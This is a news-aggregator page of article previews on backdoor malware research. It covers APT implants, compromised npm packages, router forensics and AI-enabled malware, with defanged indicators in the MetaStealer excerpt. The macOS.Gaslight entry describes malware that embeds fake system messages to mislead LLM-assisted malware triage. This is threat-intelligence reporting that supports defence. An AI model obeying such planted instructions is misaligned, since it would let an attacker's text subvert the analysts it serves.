# backdoor

Published articles for backdoor.

This is one page of public article previews, not the complete archive. Follow Next page to continue. Summaries are not the original full articles.

## China's Salt Typhoon backdoors Latin American orgs with new snooping malware

DevFeed: [China's Salt Typhoon backdoors Latin American orgs with new snooping malware](<https://devfeed.tech/articles/china-s-salt-typhoon-backdoors-latin-american-orgs-with-new-snooping-malware-42150.md>)

Original publisher: [Read original article](<https://www.theregister.com/security/2026/09/17/chinas-salt-typhoon-backdoors-latin-american-orgs-with-new-snooping-malware/5297286>)

Author: Jessica Lyons

Published: 2026-09-17T18:00:17Z

Content type: news

Language: en

Sources: [www.theregister.com - Articles](<https://devfeed.tech/sources/www-theregister-com-articles.md>)

Topics: [backdoor](<https://devfeed.tech/topics/backdoor.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [Cybersecurity](<https://devfeed.tech/topics/cybersecurity.md>), [infosec](<https://devfeed.tech/topics/infosec.md>)

Tags: [backdoor](<https://devfeed.tech/tags/backdoor.md>), [backdoor-malware](<https://devfeed.tech/tags/backdoor-malware.md>), [china](<https://devfeed.tech/tags/china.md>), [cyber](<https://devfeed.tech/tags/cyber.md>), [cybersecurity](<https://devfeed.tech/tags/cybersecurity.md>), [malware](<https://devfeed.tech/tags/malware.md>), [salt-typhoon](<https://devfeed.tech/tags/salt-typhoon.md>), [security](<https://devfeed.tech/tags/security.md>), [sparrowocky](<https://devfeed.tech/tags/sparrowocky.md>)

### AI overview

A news report about Salt Typhoon using new snooping backdoors and malware against organizations in Latin America.

### Source excerpt

Beware the SparroWocky, my son! The backdoor that bites...

## ESET Researchers Analyze SparroWocky, a New C++ Backdoor Used by FamousSparrow

DevFeed: [ESET Researchers Analyze SparroWocky, a New C++ Backdoor Used by FamousSparrow](<https://devfeed.tech/articles/beware-the-sparrowock-the-backdoor-that-bites-the-commands-that-catch-42136.md>)

Original publisher: [Read original article](<https://www.welivesecurity.com/en/eset-research/beware-sparrowock-backdoor-bites-commands-catch/>)

Author: Alexandre Côté Cyr Romain Dumont

Published: 2026-09-17T08:50:00Z

Content type: article

Language: en

Sources: [WeLiveSecurity](<https://devfeed.tech/sources/welivesecurity.md>)

Topics: [backdoor](<https://devfeed.tech/topics/backdoor.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [apt](<https://devfeed.tech/topics/apt.md>), [C++](<https://devfeed.tech/topics/c-plus-plus.md>), [ESET research](<https://devfeed.tech/topics/eset-research.md>), [Windows](<https://devfeed.tech/topics/windows.md>), [vulnerability](<https://devfeed.tech/topics/vulnerability.md>)

Tags: [apt](<https://devfeed.tech/tags/apt.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [c-plus-plus](<https://devfeed.tech/tags/c-plus-plus.md>), [eset-research](<https://devfeed.tech/tags/eset-research.md>), [malware](<https://devfeed.tech/tags/malware.md>), [sparrowocky](<https://devfeed.tech/tags/sparrowocky.md>), [vulnerability](<https://devfeed.tech/tags/vulnerability.md>), [windows](<https://devfeed.tech/tags/windows.md>), [windows-internals](<https://devfeed.tech/tags/windows-internals.md>)

### AI overview

ESET researchers analyze SparroWocky, a modular C++ backdoor that the China-aligned FamousSparrow group has deployed against organizations in Latin America since at least August 2025.

### Source excerpt

ESET researchers document SparroWocky, the new flagship backdoor of the FamousSparrow APT group

## Laravel Scalpel Scans for Filesystem Intrusion Evidence

DevFeed: [Laravel Scalpel Scans for Filesystem Intrusion Evidence](<https://devfeed.tech/articles/laravel-scalpel-scans-for-filesystem-intrusion-evidence-41327.md>)

Original publisher: [Read original article](<https://laravel-news.com/laravel-scalpel>)

Author: Yannick Lyn Fatt

Published: 2026-09-17T01:38:29Z

Content type: article

Language: en

Sources: [Laravel](<https://devfeed.tech/sources/laravel.md>)

Topics: [Laravel](<https://devfeed.tech/topics/laravel.md>), [Filesystems](<https://devfeed.tech/topics/filesystems.md>), [Security](<https://devfeed.tech/topics/security.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>), [PHP](<https://devfeed.tech/topics/php.md>)

Tags: [backdoor](<https://devfeed.tech/tags/backdoor.md>), [filesystem](<https://devfeed.tech/tags/filesystem.md>), [laravel](<https://devfeed.tech/tags/laravel.md>), [laravel-packages](<https://devfeed.tech/tags/laravel-packages.md>), [php](<https://devfeed.tech/tags/php.md>), [security](<https://devfeed.tech/tags/security.md>), [sha-256](<https://devfeed.tech/tags/sha-256.md>)

### AI overview

Laravel Scalpel is an intrusion-evidence scanner that runs inside Laravel applications. It checks filesystems for rogue PHP files, obfuscated code, altered server directives, environment issues, and changes from a trusted baseline.

### Source excerpt

Laravel Scalpel scans Laravel filesystems for rogue PHP files, obfuscated backdoors, altered directives, environment issues, and file changes. The post Laravel Scalpel Scans for Filesystem Intrusion Evidence appeared first on Laravel News. Join the Laravel Newsletter to get Laravel articles like this directly in your inbox.

## Forensic Walkthrough of a Compromised MikroTik Router and Its Persistence Mechanisms

DevFeed: [Forensic Walkthrough of a Compromised MikroTik Router and Its Persistence Mechanisms](<https://devfeed.tech/articles/a-first-hand-forensic-walkthrough-of-a-real-router-compromise-40164.md>)

Original publisher: [Read original article](<https://blog.j2sw.com/netops/mikrotik-router-compromise-forensic-walkthrough/>)

Author: j2sw

Published: 2026-09-16T13:32:46Z

Content type: article

Language: en

Sources: [Justin Wilson (j2sw)](<https://devfeed.tech/sources/justin-wilson-j2sw.md>)

Topics: [MikroTik](<https://devfeed.tech/topics/mikrotik.md>), [Vulnerabilities](<https://devfeed.tech/topics/vulnerabilities.md>), [Persistence](<https://devfeed.tech/topics/persistence.md>), [remote access](<https://devfeed.tech/topics/remote-access.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>), [ssh](<https://devfeed.tech/topics/ssh.md>)

Tags: [backdoor](<https://devfeed.tech/tags/backdoor.md>), [cybersecurity](<https://devfeed.tech/tags/cybersecurity.md>), [firmware](<https://devfeed.tech/tags/firmware.md>), [forensics](<https://devfeed.tech/tags/forensics.md>), [incident-response](<https://devfeed.tech/tags/incident-response.md>), [mikortrick](<https://devfeed.tech/tags/mikortrick.md>), [mikrotik](<https://devfeed.tech/tags/mikrotik.md>), [network-operations](<https://devfeed.tech/tags/network-operations.md>), [network-security](<https://devfeed.tech/tags/network-security.md>), [persistence](<https://devfeed.tech/tags/persistence.md>), [remote-access](<https://devfeed.tech/tags/remote-access.md>), [security](<https://devfeed.tech/tags/security.md>), [ssh](<https://devfeed.tech/tags/ssh.md>), [vulnerabilities](<https://devfeed.tech/tags/vulnerabilities.md>)

### AI overview

A forensic walkthrough examines a compromised MikroTik router in a honeypot. The intruders established persistence and remote access through scheduled tasks, scripts, new users, and tunnels. The author suspects, but cannot prove, that the compromise involved the MikroTrick RouterOS vulnerability chain.

### Source excerpt

What it looks like when an intruder tries to make your own router work against you. A note before we start: Anything in this post that could identify my network, my organization, or my router's real hostname and IP address has been redacted or made generic. The attacker's own infrastructure, such as IP addresses, ports, ... Read more The post A first-hand forensic walkthrough of a real router compromise appeared first on Justin Wilson (j2sw).

## Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure

DevFeed: [Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](<https://devfeed.tech/articles/untracked-nightmares-the-threats-hiding-behind-commodity-infrastructure-7757.md>)

Original publisher: [Read original article](<https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/>)

Author: Rem Dudas

Published: 2026-09-09T10:00:55Z

Content type: article

Language: en

Sources: [Unit 42](<https://devfeed.tech/sources/unit-42.md>)

Topics: [ARKTunnel](<https://devfeed.tech/topics/arktunnel.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>)

Tags: [arktunnel](<https://devfeed.tech/tags/arktunnel.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [c2](<https://devfeed.tech/tags/c2.md>), [cl-cri-1171](<https://devfeed.tech/tags/cl-cri-1171.md>), [cybercrime](<https://devfeed.tech/tags/cybercrime.md>), [docro-hijacker](<https://devfeed.tech/tags/docro-hijacker.md>), [gaming](<https://devfeed.tech/tags/gaming.md>), [malware](<https://devfeed.tech/tags/malware.md>), [pay-per-install](<https://devfeed.tech/tags/pay-per-install.md>), [payload](<https://devfeed.tech/tags/payload.md>), [remote-access-trojan](<https://devfeed.tech/tags/remote-access-trojan.md>), [threat-research](<https://devfeed.tech/tags/threat-research.md>), [youtube](<https://devfeed.tech/tags/youtube.md>)

### AI overview

An investigation of the CL-CRI-1171 cybercrime campaign describes how YouTube gaming lures and SEO poisoning delivered malware through a custom loader. It covers Docro Hijacker, ARKTunnel, and the Insomnia remote access Trojan.

### Source excerpt

An investigation into how cybercriminals used YouTube gaming lures and SEO poisoning to deliver multi-payload malware to enterprise networks. The post Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure appeared first on Unit 42.

## The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution

DevFeed: [The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution](<https://devfeed.tech/articles/the-state-of-ai-enabled-malware-august-2026-from-brand-abuse-to-agentic-execution-7744.md>)

Original publisher: [Read original article](<https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/>)

Author: Sara McBroom

Published: 2026-08-25T10:00:57Z

Content type: article

Language: en

Sources: [Unit 42](<https://devfeed.tech/sources/unit-42.md>)

Topics: [Malware](<https://devfeed.tech/topics/malware.md>), [Artificial Intelligence](<https://devfeed.tech/topics/ai.md>), [Security](<https://devfeed.tech/topics/security.md>), [Endpoint Security & XDR](<https://devfeed.tech/topics/endpoint-security-xdr.md>), [VirusTotal](<https://devfeed.tech/topics/virustotal.md>), [dataset](<https://devfeed.tech/topics/dataset.md>), [data](<https://devfeed.tech/topics/data.md>), [ChatGPT](<https://devfeed.tech/topics/chatgpt.md>), [ransomware](<https://devfeed.tech/topics/ransomware.md>), [Cryptocurrency](<https://devfeed.tech/topics/cryptocurrency.md>)

Tags: [agentic](<https://devfeed.tech/tags/agentic.md>), [ai](<https://devfeed.tech/tags/ai.md>), [analysis](<https://devfeed.tech/tags/analysis.md>), [article](<https://devfeed.tech/tags/article.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [bitcoin](<https://devfeed.tech/tags/bitcoin.md>), [code](<https://devfeed.tech/tags/code.md>), [cryptocurrency](<https://devfeed.tech/tags/cryptocurrency.md>), [data](<https://devfeed.tech/tags/data.md>), [dll-hijacking](<https://devfeed.tech/tags/dll-hijacking.md>), [malware](<https://devfeed.tech/tags/malware.md>), [ransomware](<https://devfeed.tech/tags/ransomware.md>), [research](<https://devfeed.tech/tags/research.md>), [sandbox](<https://devfeed.tech/tags/sandbox.md>), [security](<https://devfeed.tech/tags/security.md>), [threat-research](<https://devfeed.tech/tags/threat-research.md>), [virustotal](<https://devfeed.tech/tags/virustotal.md>)

### AI overview

Unit 42 analyzes 405 malware samples incorporating AI through mechanisms such as brand impersonation, LLM-generated code, and agentic execution loops. The research finds that most samples remain proof-of-concept or sandbox activity, while existing behavioral detection, cloud sandboxing, and endpoint analytics can detect the threats that reach operational environments.

### Source excerpt

Explore Unit 42 research on AI-enabled malware. Learn how existing behavioral detection and endpoint analytics stop AI-authored code before execution. The post The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution appeared first on Unit 42.

## 'ChainDrop' worm compromises hundreds of popular npm packages

DevFeed: ['ChainDrop' worm compromises hundreds of popular npm packages](<https://devfeed.tech/articles/chaindrop-worm-compromises-hundreds-of-popular-npm-packages-8296.md>)

Original publisher: [Read original article](<https://securitylabs.datadoghq.com/articles/npm-worm-compromises-popular-npm-packages/>)

Author: Christophe Tafani-Dereeper, Nick Frichette, Sebastian Obregoso, Martin McCloskey

Published: 2026-08-04T00:00:00Z

Content type: article

Language: en

Sources: [Datadog Security Labs](<https://devfeed.tech/sources/datadog-security-labs.md>)

Topics: [backdoor](<https://devfeed.tech/topics/backdoor.md>), [releases](<https://devfeed.tech/topics/releases.md>)

Tags: [backdoor](<https://devfeed.tech/tags/backdoor.md>), [chaindrop](<https://devfeed.tech/tags/chaindrop.md>), [github](<https://devfeed.tech/tags/github.md>), [malware](<https://devfeed.tech/tags/malware.md>), [npm-packages](<https://devfeed.tech/tags/npm-packages.md>)

### AI overview

ChainDrop is an npm worm that spread a backdoor through hundreds of compromised packages. The article analyzes its loader, which downloads or invokes Bun to run a second-stage payload.

### Source excerpt

On August 4, 2026, several popular npm packages, including 'keyv', were compromised to deliver malware.

## Not-so-anonymous telemetry: The @injectivelabs/sdk-ts backdoor

DevFeed: [Not-so-anonymous telemetry: The @injectivelabs/sdk-ts backdoor](<https://devfeed.tech/articles/not-so-anonymous-telemetry-the-injectivelabs-sdk-ts-backdoor-8295.md>)

Original publisher: [Read original article](<https://securitylabs.datadoghq.com/articles/not-so-anonymous-telemetry-injectivelabs-sdk-ts-backdoor/>)

Author: Sebastian Obregoso, Christophe Tafani-Dereeper, Eslam Salem

Published: 2026-07-09T00:00:00Z

Content type: news

Language: en

Sources: [Datadog Security Labs](<https://devfeed.tech/sources/datadog-security-labs.md>)

Topics: [backdoor](<https://devfeed.tech/topics/backdoor.md>), [SDKs](<https://devfeed.tech/topics/sdks.md>), [Blockchain](<https://devfeed.tech/topics/blockchain.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [Git](<https://devfeed.tech/topics/git.md>), [npm](<https://devfeed.tech/topics/npm.md>), [Bitcoin](<https://devfeed.tech/topics/bitcoin.md>), [TypeScript](<https://devfeed.tech/topics/typescript.md>), [servers](<https://devfeed.tech/topics/servers.md>), [ci](<https://devfeed.tech/topics/ci.md>), [Prettier](<https://devfeed.tech/topics/prettier.md>)

Tags: [backdoor](<https://devfeed.tech/tags/backdoor.md>), [bitcoin](<https://devfeed.tech/tags/bitcoin.md>), [blockchain](<https://devfeed.tech/tags/blockchain.md>), [ci](<https://devfeed.tech/tags/ci.md>), [code](<https://devfeed.tech/tags/code.md>), [git](<https://devfeed.tech/tags/git.md>), [github](<https://devfeed.tech/tags/github.md>), [http](<https://devfeed.tech/tags/http.md>), [malware](<https://devfeed.tech/tags/malware.md>), [server](<https://devfeed.tech/tags/server.md>), [telemetry](<https://devfeed.tech/tags/telemetry.md>), [typescript](<https://devfeed.tech/tags/typescript.md>)

### AI overview

A malicious commit briefly compromised the Injective blockchain's @injectivelabs/sdk-ts npm package by disguising a credential-stealing backdoor as telemetry code. The malware captured wallet mnemonic seed phrases and private keys, encoded them, and exfiltrated them through HTTP requests to a remote endpoint before the code was reverted.

### Source excerpt

A malicious commit disguised as SDK telemetry briefly compromised @injectivelabs/sdk-ts, exfiltrating wallet mnemonics and private keys.

## macOS.Gaslight | Rust Backdoor Turns Prompt Injection on the Analyst, Not the Sandbox

DevFeed: [macOS.Gaslight | Rust Backdoor Turns Prompt Injection on the Analyst, Not the Sandbox](<https://devfeed.tech/articles/macos-gaslight-rust-backdoor-turns-prompt-injection-on-the-analyst-not-the-sandbox-8318.md>)

Original publisher: [Read original article](<https://www.sentinelone.com/labs/macos-gaslight-rust-backdoor-turns-prompt-injection-on-the-analyst-not-the-sandbox/>)

Author: Phil Stokes

Published: 2026-06-23T21:59:42Z

Content type: article

Language: en

Sources: [SentinelLabs - We are hunters, reversers, exploit developers, and tinkerers shedding light on the world of malware, exploits, APTs, and cybercrime across all platforms.](<https://devfeed.tech/sources/sentinellabs-we-are-hunters-reversers-exploit-developers-and-tinkerers-shedding-light-on-the-world-of-malware-exploits-apts-and-cybercrime-across-all-platforms.md>)

Topics: [AI Bots](<https://devfeed.tech/topics/ai-bots.md>), [AI Chat](<https://devfeed.tech/topics/ai-chat.md>)

Tags: [agent](<https://devfeed.tech/tags/agent.md>), [analysis](<https://devfeed.tech/tags/analysis.md>), [api](<https://devfeed.tech/tags/api.md>), [apple](<https://devfeed.tech/tags/apple.md>), [attacks](<https://devfeed.tech/tags/attacks.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [c2](<https://devfeed.tech/tags/c2.md>), [data](<https://devfeed.tech/tags/data.md>), [llm](<https://devfeed.tech/tags/llm.md>), [logs](<https://devfeed.tech/tags/logs.md>), [macos](<https://devfeed.tech/tags/macos.md>), [malware](<https://devfeed.tech/tags/malware.md>), [payload](<https://devfeed.tech/tags/payload.md>), [rust](<https://devfeed.tech/tags/rust.md>), [sandbox](<https://devfeed.tech/tags/sandbox.md>), [spoof](<https://devfeed.tech/tags/spoof.md>), [telegram](<https://devfeed.tech/tags/telegram.md>), [tls](<https://devfeed.tech/tags/tls.md>), [update](<https://devfeed.tech/tags/update.md>), [virustotal](<https://devfeed.tech/tags/virustotal.md>)

### AI overview

SentinelLABS analyzes macOS.Gaslight, a Rust implant whose embedded prompt injection attempts to derail LLM-assisted malware triage. The report describes Telegram Bot API command and control, encrypted communications, token redaction, and a suspected DPRK-linked activity cluster.

### Source excerpt

DPRK-linked implant embeds 38 fabricated system messages that spoof an LLM triage harness, hiding a credential stealer and Telegram C2 underneath.

## MetaStealer traffic, new DGAs and analyzing the "tracker" backdoor DGA with AI

DevFeed: [MetaStealer traffic, new DGAs and analyzing the "tracker" backdoor DGA with AI](<https://devfeed.tech/articles/metastealer-traffic-new-dgas-and-analyzing-the-tracker-backdoor-dga-with-ai-22543.md>)

Original publisher: [Read original article](<https://medium.com/walmartglobaltech/metastealer-traffic-new-dgas-and-analyzing-the-tracker-backdoor-dga-with-ai-96ea63dc7c01?source=rss----905ea2b3d4d1---4>)

Author: Jason Reaves

Published: 2026-06-17T21:54:01Z

Content type: article

Language: en

Sources: [Walmart Global Tech](<https://devfeed.tech/sources/walmart-global-tech.md>)

Topics: [Malware](<https://devfeed.tech/topics/malware.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>), [payload](<https://devfeed.tech/topics/payload.md>), [Python](<https://devfeed.tech/topics/python.md>), [Claude](<https://devfeed.tech/topics/claude.md>), [Artificial Intelligence](<https://devfeed.tech/topics/ai.md>)

Tags: [ai](<https://devfeed.tech/tags/ai.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [capture](<https://devfeed.tech/tags/capture.md>), [claude](<https://devfeed.tech/tags/claude.md>), [claude-ai](<https://devfeed.tech/tags/claude-ai.md>), [infosec](<https://devfeed.tech/tags/infosec.md>), [ip](<https://devfeed.tech/tags/ip.md>), [malware](<https://devfeed.tech/tags/malware.md>), [payload](<https://devfeed.tech/tags/payload.md>), [port](<https://devfeed.tech/tags/port.md>), [python](<https://devfeed.tech/tags/python.md>), [reverse-engineering](<https://devfeed.tech/tags/reverse-engineering.md>)

### AI overview

The article examines new MetaStealer domain-generation algorithms and explains that its gate servers rely more on IP addresses, ports, URIs, and HTTP headers than on domains. It also analyzes RuntimeSync, a developing malware sample with RAT and backdoor capabilities, and describes using Claude.ai Sonnet 4.6 to reverse engineer its DGA and produce Python simulation code.

### Source excerpt

By: Jason Reaves and Joshua Platt In this blog we simply want to highlight a few new additions to what appears to be related to MetaStealer, one is a new wordlist based DGA used by MetaStealer. We also want to highlight that MetaStealer's proxies or 'gates' don't actually care what domain gets used as it's just a config item; they simply pass on the traffic to another server. We also want to highlight a task that was seen delivered to a few bots which is related to MetaStealer but appears to still be in development. This turned out to be a piece of malware that contains RAT/backdoor functionality. Leveraging Claude.ai Sonnet 4.6 we were able to systematically guide the AI to automatically reverse engineer the DGA used in the backdoor malware and provide working python code to simulate it. MetaStealer DGA: As previously mentioned MetaStealers new DGA is based on a wordlist. Below are some recent examples: sea-vast-send.com 46bbaceb6073f196bf7737c67f5394a6465e396bbcbbac1afe5f2f866c995fd0hxxp://pestrear-lamp.xyz:443 d57e132866286f9b4227c7fb1cd77f16a461e76a3f3e71362734741aab6b9a96hxxp://anus-staylard.xyz:443 d1b88ded80f0e616362b8984334c69da1ea2f32d0828480e32978d1a710f40c5 This does not mean, however, that the older DGA is no longer in use; it remains active. The threat actor (TA) has designed their gate servers in such a way that they are largely agnostic to the domain being used. Instead, the IP address, port, URI, and HTTP headers are the more important factors. 155.117.20.75 qocyeicmusmegouw.xyz 213.139.77.254 uumcceymkuymmqou.xyz We didn't focus on this DGA though because during our investigation we stumbled on a piece of malware being actively developed by the same TA that also had a DGA. Backdoor "tracker" During the investigation, we observed a peculiar payload being delivered to several machines: an installer named RuntimeSync, example hash: 82c218357266ce314f523946bdd661cc335a120981c471e95d70af7fbd4d9141 RuntimeSyncExe: PE32+ executable (GUI) x86-64, for MS Win

## FishMonger's arsenal upgraded: SprySOCKS for Windows

DevFeed: [FishMonger's arsenal upgraded: SprySOCKS for Windows](<https://devfeed.tech/articles/fishmonger-s-arsenal-upgraded-sprysocks-for-windows-8368.md>)

Original publisher: [Read original article](<https://www.welivesecurity.com/en/eset-research/fishmongers-arsenal-upgraded-sprysocks-windows/>)

Author: ESET Research

Published: 2026-06-16T08:54:04Z

Content type: article

Language: en

Sources: [WeLiveSecurity](<https://devfeed.tech/sources/welivesecurity.md>)

Topics: [backdoor](<https://devfeed.tech/topics/backdoor.md>), [Processes](<https://devfeed.tech/topics/processes.md>), [telemetry](<https://devfeed.tech/topics/telemetry.md>)

Tags: [analysis](<https://devfeed.tech/tags/analysis.md>), [apt](<https://devfeed.tech/tags/apt.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [china](<https://devfeed.tech/tags/china.md>), [communication](<https://devfeed.tech/tags/communication.md>), [drivers](<https://devfeed.tech/tags/drivers.md>), [eset-research](<https://devfeed.tech/tags/eset-research.md>), [government](<https://devfeed.tech/tags/government.md>), [kernel](<https://devfeed.tech/tags/kernel.md>), [linux](<https://devfeed.tech/tags/linux.md>), [malware](<https://devfeed.tech/tags/malware.md>), [process](<https://devfeed.tech/tags/process.md>), [processes](<https://devfeed.tech/tags/processes.md>), [telemetry](<https://devfeed.tech/tags/telemetry.md>), [virustotal](<https://devfeed.tech/tags/virustotal.md>), [windows](<https://devfeed.tech/tags/windows.md>)

### AI overview

ESET reports two previously undocumented Windows variants of the SprySOCKS backdoor attributed to FishMonger. The variants use TCP, UDP, and WebSocket communications; WIN_DRV uses a kernel driver to conceal artifacts and redirect specially crafted TCP traffic.

### Source excerpt

ESET researchers have discovered SprySOCKS for Windows, FishMonger's backdoor weaponizing a kernel driver for advanced stealthiness

## OceanLotus: From external espionage to domestic targeting

DevFeed: [OceanLotus: From external espionage to domestic targeting](<https://devfeed.tech/articles/oceanlotus-from-external-espionage-to-domestic-targeting-8378.md>)

Original publisher: [Read original article](<https://www.welivesecurity.com/en/eset-research/oceanlotus-external-espionage-domestic-targeting/>)

Author: ESET Research

Published: 2026-06-11T08:45:00Z

Content type: article

Language: en

Sources: [WeLiveSecurity](<https://devfeed.tech/sources/welivesecurity.md>)

Topics: [backdoor](<https://devfeed.tech/topics/backdoor.md>), [networking](<https://devfeed.tech/topics/networking.md>)

Tags: [apt](<https://devfeed.tech/tags/apt.md>), [attacks](<https://devfeed.tech/tags/attacks.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [dns](<https://devfeed.tech/tags/dns.md>), [eset-research](<https://devfeed.tech/tags/eset-research.md>), [linux](<https://devfeed.tech/tags/linux.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [telemetry](<https://devfeed.tech/tags/telemetry.md>)

### AI overview

The article analyzes OceanLotus's shift toward domestic espionage and two SPECTRALVIPER campaigns in Vietnam: a targeted supply-chain compromise of investor software and a prolonged intrusion against a construction corporation.

### Source excerpt

A shift in operational pattern of the infamous Vietnam-aligned APT group

## LABScon25 Replay | Gamaredon x Turla: Unveiling a 2025 Espionage Alliance Targeting Ukraine

DevFeed: [LABScon25 Replay | Gamaredon x Turla: Unveiling a 2025 Espionage Alliance Targeting Ukraine](<https://devfeed.tech/articles/labscon25-replay-gamaredon-x-turla-unveiling-a-2025-espionage-alliance-targeting-ukraine-8316.md>)

Original publisher: [Read original article](<https://www.sentinelone.com/labs/labscon25-replay-gamaredon-x-turla-unveiling-a-2025-espionage-alliance-targeting-ukraine/>)

Author: LABScon

Published: 2026-06-02T13:00:58Z

Content type: article

Language: en

Sources: [SentinelLabs - We are hunters, reversers, exploit developers, and tinkerers shedding light on the world of malware, exploits, APTs, and cybercrime across all platforms.](<https://devfeed.tech/sources/sentinellabs-we-are-hunters-reversers-exploit-developers-and-tinkerers-shedding-light-on-the-world-of-malware-exploits-apts-and-cybercrime-across-all-platforms.md>)

Topics: [LABScon](<https://devfeed.tech/topics/labscon.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [Threat Research](<https://devfeed.tech/topics/threat-research.md>), [Reverse Engineering](<https://devfeed.tech/topics/reverse-engineering.md>), [Threat Hunting & Intel](<https://devfeed.tech/topics/threat-hunting-intel.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>)

Tags: [analysis](<https://devfeed.tech/tags/analysis.md>), [apt](<https://devfeed.tech/tags/apt.md>), [attacks](<https://devfeed.tech/tags/attacks.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [conferences](<https://devfeed.tech/tags/conferences.md>), [labscon](<https://devfeed.tech/tags/labscon.md>), [labscon25](<https://devfeed.tech/tags/labscon25.md>), [malware](<https://devfeed.tech/tags/malware.md>), [presentation](<https://devfeed.tech/tags/presentation.md>), [research](<https://devfeed.tech/tags/research.md>), [reverse-engineering](<https://devfeed.tech/tags/reverse-engineering.md>)

### AI overview

ESET researchers present technical evidence that Gamaredon facilitated Turla's access to high-value Ukrainian targets between February and June 2025. The presentation examines their operational collaboration, the deployment of Turla's Kazuar backdoor, and the implications for defenders tracking Russian cyberespionage.

### Source excerpt

ESET researchers show how Gamaredon facilitated Turla access to Ukrainian targets, revealing rare cooperation between FSB-linked espionage groups.

## Bringing full YAML anchor support to zizmor

DevFeed: [Bringing full YAML anchor support to zizmor](<https://devfeed.tech/articles/bringing-full-yaml-anchor-support-to-zizmor-7651.md>)

Original publisher: [Read original article](<https://blog.trailofbits.com/2026/05/22/we-hardened-zizmors-github-actions-static-analyzer/>)

Author: "Alexis Challande"

Published: 2026-05-22T11:00:00Z

Content type: article

Language: en

Sources: [The Trail of Bits Blog](<https://devfeed.tech/sources/the-trail-of-bits-blog.md>), [The Trail of Bits Blog](<https://devfeed.tech/sources/the-trail-of-bits-blog-2.md>)

Topics: [GitHub Actions](<https://devfeed.tech/topics/github-actions.md>), [YAML](<https://devfeed.tech/topics/yaml.md>), [GitHub](<https://devfeed.tech/topics/github.md>), [ci](<https://devfeed.tech/topics/ci.md>), [BigQuery](<https://devfeed.tech/topics/bigquery.md>), [bug](<https://devfeed.tech/topics/bug.md>), [Open Source](<https://devfeed.tech/topics/open-source.md>), [dataset](<https://devfeed.tech/topics/dataset.md>)

Tags: [backdoor](<https://devfeed.tech/tags/backdoor.md>), [bigquery](<https://devfeed.tech/tags/bigquery.md>), [bug](<https://devfeed.tech/tags/bug.md>), [bugs](<https://devfeed.tech/tags/bugs.md>), [ci](<https://devfeed.tech/tags/ci.md>), [ecosystem-security](<https://devfeed.tech/tags/ecosystem-security.md>), [engineering-practice](<https://devfeed.tech/tags/engineering-practice.md>), [github](<https://devfeed.tech/tags/github.md>), [github-actions](<https://devfeed.tech/tags/github-actions.md>), [open-source](<https://devfeed.tech/tags/open-source.md>), [post-mortem](<https://devfeed.tech/tags/post-mortem.md>), [pull-requests](<https://devfeed.tech/tags/pull-requests.md>), [secrets](<https://devfeed.tech/tags/secrets.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [testing](<https://devfeed.tech/tags/testing.md>)

### AI overview

Trail of Bits describes how it collaborated with zizmor maintainers to add full YAML anchor support to the GitHub Actions static analyzer. The work fixed parsing and deserialization issues, aligned expression evaluation with GitHub's tests, and was validated against 41,253 workflows from 6,612 open-source repositories.

### Source excerpt

In March 2026, attackers exploited a pull_request_target misconfiguration in the aquasecurity/trivy-action GitHub Action to exfiltrate organization and repository secrets, then used those credentials to backdoor LiteLLM on PyPI (see Trivy's post-mortem for the full timeline). zizmor is a static analyzer that GitHub Actions users run to catch exactly these misconfigurations before they ship. When GitHub Actions added support for YAML anchors in September 2025, a small but high-value slice of the ecosystem started writing workflows that zizmor could only analyze on a best-effort basis. Over the past three months, Trail of Bits collaborated with the zizmor maintainers to bring zizmor's anchor support up to full coverage. First, we fixed parsing bugs that caused crashes, produced wrong-location findings, and silently mishandled aliased values. Second, we surfaced deserialization edge cases that broke zizmor on otherwise valid workflows. Finally, we helped align zizmor's expression evaluator with GitHub's own Known Answer Tests. We validated all of this against a new corpus of 41,253 workflows from 6,612 high-value open-source repositories. The result: 20 filed issues, 15 merged pull requests. Building the test corpus To understand how anchors are used in CI today and to stress-test zizmor against the full variety of YAML it encounters in the wild, we built a corpus of real workflows. We used BigQuery's GitHub dataset to identify the 10,000 most-starred repositories created between 2022 and 2025, filtered to the 6,612 that use GitHub Actions, and downloaded every workflow file. That gave us 41,253 YAML files. Figure 1: Building a testing corpus When we ran zizmor against the corpus, it crashed on 45 of the 41,253 workflows. That's a low rate, but each crash means a bug in zizmor. How anchors are used in the wild zizmor's anchor support was deliberately limited, and for good reason. YAML anchors make workflows non-local: an alias defined in one place changes behavior else

## Webworm: New burrowing techniques

DevFeed: [Webworm: New burrowing techniques](<https://devfeed.tech/articles/webworm-new-burrowing-techniques-8383.md>)

Original publisher: [Read original article](<https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/>)

Author: Eric Howard

Published: 2026-05-20T08:40:00Z

Content type: article

Language: en

Sources: [WeLiveSecurity](<https://devfeed.tech/sources/welivesecurity.md>)

